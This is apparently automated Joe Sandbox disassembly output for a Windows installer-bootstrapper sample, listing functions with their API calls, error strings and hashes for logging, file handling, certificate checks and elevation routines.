Opcode Fuzzy Hash: 832ec5ec8b0af513e82fe984c8c6ff6593a1fcdb3d89bd09fd72f28fa8c93742
Instruction Fuzzy Hash: FF8134B560474ADFCB14CF58C980AAA7BA5BF48324F128669EC558B352C730EC10CF90

Function 009CCAED Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,009CD262,00000000,00000000,00000000,00000000,00000000,009C2F1D), ref: 009CCB2F
__fassign.LIBCMT ref: 009CCBAA
__fassign.LIBCMT ref: 009CCBC5
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 009CCBEB
WriteFile.KERNEL32(?,00000000,00000000,009CD262,00000000,?,?,?,?,?,?,?,?,?,009CD262,00000000), ref: 009CCC0A
WriteFile.KERNEL32(?,00000000,00000001,009CD262,00000000,?,?,?,?,?,?,?,?,?,009CD262,00000000), ref: 009CCC43

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: b31e3014adb7bed0ad9cff55d941c749dc5022c01e5cec8d7a035ffc372c4624
Instruction ID: e9c01f00596715e518a783c511afb37b18be6add97e64621caaa11891ce48258
Opcode Fuzzy Hash: b31e3014adb7bed0ad9cff55d941c749dc5022c01e5cec8d7a035ffc372c4624
Instruction Fuzzy Hash: 1F519FB1E042099FDB10CFA8D885FEEBBB8EF49300F14455EE959E7291E7309941CBA1

Function 009B9279 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 150COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,00000100,00000000,?,?,?,009A7113,000000B8,0000001C,00000100), ref: 009B92A4
CompareStringW.KERNEL32(00000000,00000001,?,000000FF,009DB4B8,000000FF,?,?,?,009A7113,000000B8,0000001C,00000100,00000100,00000100,000000B0), ref: 009B932E

Strings

BA aborted detect forward compatible bundle., xrefs: 009B9398
Failed to initialize update bundle., xrefs: 009B93D1
detect.cpp, xrefs: 009B938E
comres.dll, xrefs: 009B93B0

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CompareString
String ID: BA aborted detect forward compatible bundle.$Failed to initialize update bundle.$comres.dll$detect.cpp
API String ID: 1825529933-439563586
Opcode ID: 464f538fbc6c5a21c0e3599696ccf9a4b8ddca0ed47110471a3710d97f39ba54
Instruction ID: 9f94b8a1ee01de356ce6c5f15535ef62ac6cbc9f24cb46655a1284a6c9391762
Opcode Fuzzy Hash: 464f538fbc6c5a21c0e3599696ccf9a4b8ddca0ed47110471a3710d97f39ba54
Instruction Fuzzy Hash: 1B51CF70610211FBDF158F64CD81FEABBAAFF45320F104259FA249A2A1C771EC60DBA0

Function 009AAB9E Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 140COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00995479,000000FF,00AAC56B,E9009DBA,009953BD,00000000,?,E9009DBA,00000000), ref: 009AAC94
GetLastError.KERNEL32(00000000,00000000,00000000,00000000,00995479,000000FF,00AAC56B,E9009DBA,009953BD,00000000,?,E9009DBA,00000000), ref: 009AACD8

Strings

Failed to verify expected payload against actual certificate chain., xrefs: 009AAD1E
Failed to get signer chain from authenticode certificate., xrefs: 009AAD06
Failed authenticode verification of payload: %ls, xrefs: 009AAC75
Failed to get provider state from authenticode certificate., xrefs: 009AACC2
cache.cpp, xrefs: 009AAC6A, 009AACB8, 009AACFC

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast
String ID: Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to verify expected payload against actual certificate chain.$cache.cpp
API String ID: 1452528299-2590768268
Opcode ID: 5c0ebf1ca4b959b87dff0a51dfdd4ece65880d55e6d86605482acfbc2601753f
Instruction ID: d529fce9687da07ef0aedc60bbfc9bb8659fd91aa21e5c0ea809d012df618134
Opcode Fuzzy Hash: 5c0ebf1ca4b959b87dff0a51dfdd4ece65880d55e6d86605482acfbc2601753f
Instruction Fuzzy Hash: 7F41A572D41269ABDB119B99CC45BEEBBB8EF49770F110129FD40BB281D7709D04CAE2

Function 009D02F8 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 123COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 009D033C
GetComputerNameW.KERNEL32(?,?), ref: 009D0394

Strings

--- logging level: %hs ---, xrefs: 009D0454
Executable: %ls v%d.%d.%d.%d, xrefs: 009D03F0
=== Logging started: %ls ===, xrefs: 009D03BF
Computer : %ls, xrefs: 009D0402

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Name$ComputerFileModule
String ID: --- logging level: %hs ---$=== Logging started: %ls ===$Computer : %ls$Executable: %ls v%d.%d.%d.%d
API String ID: 2577110986-3153207428
Opcode ID: 7c5444131dd259ea54480ed4c409f5d799f4ceee70dbeb70005f52ea3e2403ae
Instruction ID: 74d9815eaa5ff1562676358268224c91b9f0509971ae10cbaaf1433d0058ffa9
Opcode Fuzzy Hash: 7c5444131dd259ea54480ed4c409f5d799f4ceee70dbeb70005f52ea3e2403ae
Instruction Fuzzy Hash: C24172F2D441189BCB10DB64DD45FFA77BCEB94304F4081ABE609A3252E630AE849FA5

Function 009AD437 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 120COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,?,00000001,009DB500,?,00000001,000000FF,?,?,76C1B390,00000000,00000001,00000000,?,009A74E6), ref: 009AD560

Strings

Failed to create pipe and cache pipe., xrefs: 009AD4BD
Failed to connect to elevated child process., xrefs: 009AD549
Failed to elevate., xrefs: 009AD542
Failed to create pipe name and client token., xrefs: 009AD4A1
elevation.cpp, xrefs: 009AD46B
UX aborted elevation requirement., xrefs: 009AD475

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CloseHandle
String ID: Failed to connect to elevated child process.$Failed to create pipe and cache pipe.$Failed to create pipe name and client token.$Failed to elevate.$UX aborted elevation requirement.$elevation.cpp
API String ID: 2962429428-3003415917
Opcode ID: a150b4b7b714a7aa79c672000a0355e2b1175b54c382bd5ea5dbe4e300554157
Instruction ID: 70b1a74665d05357449b122d8642fc90a8c264baa684a089c2cc234e78e3070a
Opcode Fuzzy Hash: a150b4b7b714a7aa79c672000a0355e2b1175b54c382bd5ea5dbe4e300554157
Instruction Fuzzy Hash: 90318472A4A725BBEB16A6A4CC43FBBB35DDF82734F104205F905A71D1DB61AD0083D5

Function 009AD24B Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 118threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,009AAD40,?,00000000,00000000), ref: 009AD2E9
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009AD2F5

Part of subcall function 009ACF25: WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,009AD365,00000000,?,?,009AC7C9,00000001,?,?,?,?,?), ref: 009ACF37
Part of subcall function 009ACF25: GetLastError.KERNEL32(?,?,009AD365,00000000,?,?,009AC7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 009ACF41

CloseHandle.KERNEL32(00000000,00000000,?,?,009AC7C9,00000001,?,?,?,?,?,00000000,00000000,?,?,?), ref: 009AD376

Strings

Failed to pump messages in child process., xrefs: 009AD34D
Failed to create elevated cache thread., xrefs: 009AD323
elevation.cpp, xrefs: 009AD319

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$CloseCreateHandleObjectSingleThreadWait
String ID: Failed to create elevated cache thread.$Failed to pump messages in child process.$elevation.cpp
API String ID: 3606931770-4134175193
Opcode ID: f8330e82056aa08af1a64cf5acaa32ae891974e5bfa46b5a596a055d1ce1f79d
Instruction ID: 5b5642a094330fcd990b83072b720cd012d423d8bb802ecf81072fbcbecb6090
Opcode Fuzzy Hash: f8330e82056aa08af1a64cf5acaa32ae891974e5bfa46b5a596a055d1ce1f79d
Instruction Fuzzy Hash: 3641F6B6D06219AF8F01DF99D885ADEBBF8FF48710F10416AF919A7340E77099408B95

Function 009D159E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 117stringregistryCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000000,00000000,BundleUpgradeCode), ref: 009D15DA
lstrlenW.KERNEL32(?,00000002,00000001,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 009D163C
lstrlenW.KERNEL32(?), ref: 009D1648
RegSetValueExW.ADVAPI32(?,?,00000000,00000007,?,?,00000001,?,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 009D168B

Strings

regutil.cpp, xrefs: 009D16B3
BundleUpgradeCode, xrefs: 009D15A7

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: lstrlen$Value
String ID: BundleUpgradeCode$regutil.cpp
API String ID: 198323757-1648651458
Opcode ID: f0889c86927f38e846e4b91d21faaa96610e5333882e1c82b8e0e3d21be06fad
Instruction ID: 613cf573d12071ac0a17188d65a88207d7911338fb1bb0fa83034ec3bbff989a
Opcode Fuzzy Hash: f0889c86927f38e846e4b91d21faaa96610e5333882e1c82b8e0e3d21be06fad
Instruction Fuzzy Hash: 4D41917394062ABBCB119F98CD81AAEBBB9FB44750F054156FD11AB310C730DD119BA0

Function 009D0523 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(009FB5FC,00000000,?,?,?,009A4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,009954FA,?), ref: 009D0533
CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,009FB5F4,?,009A4207,00000000,Setup), ref: 009D05D7
GetLastError.KERNEL32(?,009A4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,009954FA,?,?,?), ref: 009D05E7
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,009A4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,009954FA,?), ref: 009D0621

Part of subcall function 00992DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00992F09

LeaveCriticalSection.KERNEL32(009FB5FC,?,?,009FB5F4,?,009A4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,009954FA,?), ref: 009D067A

Strings

logutil.cpp, xrefs: 009D0606

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
String ID: logutil.cpp
API String ID: 4111229724-3545173039
Opcode ID: 43844d6138b04176ffc5d21a0190f8b82f989a101ff8d508b7edb75fc893b454
Instruction ID: fd6833415c19bc7df7e3e3a8f82801c205cfb4c73c0b2c27c445b1f77af6ca38
Opcode Fuzzy Hash: 43844d6138b04176ffc5d21a0190f8b82f989a101ff8d508b7edb75fc893b454
Instruction Fuzzy Hash: E4310331D9422AFBCB119F61DD45F6A776CABC0744F818226FA00AA260D734CC60EBA0

Function 009B398D Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 112COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 009B39F4

Strings

Failed to escape string., xrefs: 009B3A76
Failed to format property string part., xrefs: 009B3A6F
Failed to append property string part., xrefs: 009B3A68
%s%="%s", xrefs: 009B3A27
Failed to format property value., xrefs: 009B3A7D

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Open@16
String ID: %s%="%s"$Failed to append property string part.$Failed to escape string.$Failed to format property string part.$Failed to format property value.
API String ID: 3613110473-515423128
Opcode ID: 2477ece5c57684b8859d6e98fba4cd94a24705b2fad3000dbb1b195b3f1ea01a
Instruction ID: 068ba8bf192b814dca0b8adfd5aba97420076db4aff8dc2bb95fb5ebb260096f
Opcode Fuzzy Hash: 2477ece5c57684b8859d6e98fba4cd94a24705b2fad3000dbb1b195b3f1ea01a
Instruction Fuzzy Hash: F431C172905229FFDF15DF98CE42AEEB768AF40724F20826AF85166250D770AF10DB90

Function 009D41E5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 101COMMON

Download Yara Rule

APIs

MoveFileExW.KERNEL32(00000003,00000001,00000000,00000000,00000101,?,009D432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,009AA063,00000001), ref: 009D4203
GetLastError.KERNEL32(00000002,?,009D432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,009AA063,00000001,000007D0,00000001,00000001,00000003), ref: 009D4212
MoveFileExW.KERNEL32(00000003,00000001,00000000,00000001,00000000,?,009D432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,009AA063,00000001), ref: 009D42A6
GetLastError.KERNEL32(?,009D432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,009AA063,00000001,000007D0,00000001), ref: 009D42B0

Part of subcall function 009D4440: FindFirstFileW.KERNEL32(009B923A,?,00000100,00000000,00000000), ref: 009D447B
Part of subcall function 009D4440: FindClose.KERNEL32(00000000), ref: 009D4487

Strings

fileutil.cpp, xrefs: 009D42CF
\, xrefs: 009D4265

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: File$ErrorFindLastMove$CloseFirst
String ID: \$fileutil.cpp
API String ID: 3479031965-1689471480
Opcode ID: 494dfb9d2de1c31c12271cb35e09d0146a93d1236043ff9c035cad0737a68370
Instruction ID: 6187eb678fc571ca44e08e61200bd7074a91b522484b60e12ce1aba7cdd11a4d
Opcode Fuzzy Hash: 494dfb9d2de1c31c12271cb35e09d0146a93d1236043ff9c035cad0737a68370
Instruction Fuzzy Hash: A031B136A85226EBDF215E9ACC00A6E766DFFA1760B11C12BFE649B310D3708D8196D0

Function 0099732C Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 92COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,?,00995932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 0099733E
LeaveCriticalSection.KERNEL32(00000000,00000000,00000100,00000000,?,?,?,00995932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 0099741D

Strings

Failed to get unformatted string., xrefs: 009973AE
Failed to get value as string for variable: %ls, xrefs: 0099740C
*****, xrefs: 009973D9, 009973E6
Failed to get variable: %ls, xrefs: 0099737F
Failed to format value '%ls' of variable: %ls, xrefs: 009973E7

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: *****$Failed to format value '%ls' of variable: %ls$Failed to get unformatted string.$Failed to get value as string for variable: %ls$Failed to get variable: %ls
API String ID: 3168844106-2873099529
Opcode ID: 2936f65ea9b7ee86081976443357bc30d7c17174767b42e361b436e13aa3059a
Instruction ID: bc7cec578cc61565b7f11b484bc12780b0c58984cc71afab425e46e6a9ac742c
Opcode Fuzzy Hash: 2936f65ea9b7ee86081976443357bc30d7c17174767b42e361b436e13aa3059a
Instruction Fuzzy Hash: D831E77295851AFBDF215F88CC06B9EBB69FF60321F008525FD0066261DB31AE90EBD0

Function 009A8DEC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 78COMMON

Download Yara Rule

APIs

InitializeAcl.ADVAPI32(?,00000008,00000002,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 009A8E37
GetLastError.KERNEL32 ref: 009A8E41
SetFileAttributesW.KERNEL32(?,00000080,?,00000001,20000004,00000000,00000000,?,00000000,00000003,000007D0,?,00000000,00000000,?,?), ref: 009A8EA1

Strings

Failed to allocate administrator SID., xrefs: 009A8E1D
cache.cpp, xrefs: 009A8E65
Failed to initialize ACL., xrefs: 009A8E6F

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AttributesErrorFileInitializeLast
String ID: Failed to allocate administrator SID.$Failed to initialize ACL.$cache.cpp
API String ID: 669721577-1117388985
Opcode ID: 22741dd2c4c2ad060be1d6da2061dd7f34b1583d0ec87aff8a2b805df56a284d
Instruction ID: dc067f59c93e1b277b5e34d2e49a1af978667f22e761560a7afa3a59418b4338
Opcode Fuzzy Hash: 22741dd2c4c2ad060be1d6da2061dd7f34b1583d0ec87aff8a2b805df56a284d
Instruction Fuzzy Hash: 0B21EB32E85218F7DB21AED59C45F9FF76DAB85B60F218026FD04FB280EA709D0096D0

Function 00994212 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,00000000,crypt32.dll,?,?,009A4028,00000001,feclient.dll,?,00000000,?,?,?,00994B12), ref: 0099424D
GetLastError.KERNEL32(?,?,009A4028,00000001,feclient.dll,?,00000000,?,?,?,00994B12,?,?,009DB488,?,00000001), ref: 00994259
GetCurrentDirectoryW.KERNEL32(00000000,?,?,00000000,?,?,009A4028,00000001,feclient.dll,?,00000000,?,?,?,00994B12,?), ref: 00994294
GetLastError.KERNEL32(?,?,009A4028,00000001,feclient.dll,?,00000000,?,?,?,00994B12,?,?,009DB488,?,00000001), ref: 0099429E

Strings

dirutil.cpp, xrefs: 009942C2
crypt32.dll, xrefs: 00994216

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CurrentDirectoryErrorLast
String ID: crypt32.dll$dirutil.cpp
API String ID: 152501406-1104880720
Opcode ID: 9cb0c326b8c4bc38781f951efcaac24779e384462a88f9a8dacbff636770b838
Instruction ID: 8e6609ca2dd297cf39242ef531f01abf3df85a6b357ea3943b696e59bc32e714
Opcode Fuzzy Hash: 9cb0c326b8c4bc38781f951efcaac24779e384462a88f9a8dacbff636770b838
Instruction Fuzzy Hash: 3B11B777E41637AB9F225BDE8844E5FBB9CBF057A17160165FE10E7200EB21DC0196E0

Function 009B0B8E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74fileCOMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 009B0BDE
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 009B0BFD
GetLastError.KERNEL32 ref: 009B0C07

Strings

cabextract.cpp, xrefs: 009B0C2B
Unexpected call to CabWrite()., xrefs: 009B0BC1
Failed to write during cabinet extraction., xrefs: 009B0C35

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastWrite_memcpy_s
String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
API String ID: 1970631241-3111339858
Opcode ID: 3102dd2f0a01abc4d0e84e14697c6f29d1f44739236ee3f6ac07155f8cf417d8
Instruction ID: b93db76dd2e7153f646b7ec4900e775dedf85e0c1a5b18de9a18bf90db686c83
Opcode Fuzzy Hash: 3102dd2f0a01abc4d0e84e14697c6f29d1f44739236ee3f6ac07155f8cf417d8
Instruction Fuzzy Hash: 9721FF7A544204ABCB11CF5DCA81EAA3BA8FFC8320B214159FE18C7251E731ED00CB60

Function 00999AE0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 72COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00999AFB
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,00000000,?,0099A8B4,00000100,000002C0,000002C0,00000100), ref: 00999B10
GetLastError.KERNEL32(?,0099A8B4,00000100,000002C0,000002C0,00000100), ref: 00999B1B

Strings

Failed to format variable string., xrefs: 00999B06
Failed while searching directory search: %ls, for path: %ls, xrefs: 00999B54
Failed to set variable., xrefs: 00999B7A

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Failed to format variable string.$Failed to set variable.$Failed while searching directory search: %ls, for path: %ls
API String ID: 1811509786-402580132
Opcode ID: bc398ac1862ba68082b61b4b5e4bc353916aa03213495b2fdaed8a56bcb9b58f
Instruction ID: 323af0b6a61eede7bb219c9e9de9e1bfa811f497e50008ee035e1450570b3ba1
Opcode Fuzzy Hash: bc398ac1862ba68082b61b4b5e4bc353916aa03213495b2fdaed8a56bcb9b58f
Instruction Fuzzy Hash: 6011D633981525FBDF22569CAC42F6EB71CDF54374F11431AFA1066290C7299D50A6D4

Function 009B0C57 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70timeCOMMON

Download Yara Rule

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 009B0CC4
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009B0CD6
SetFileTime.KERNEL32(?,?,?,?), ref: 009B0CE9
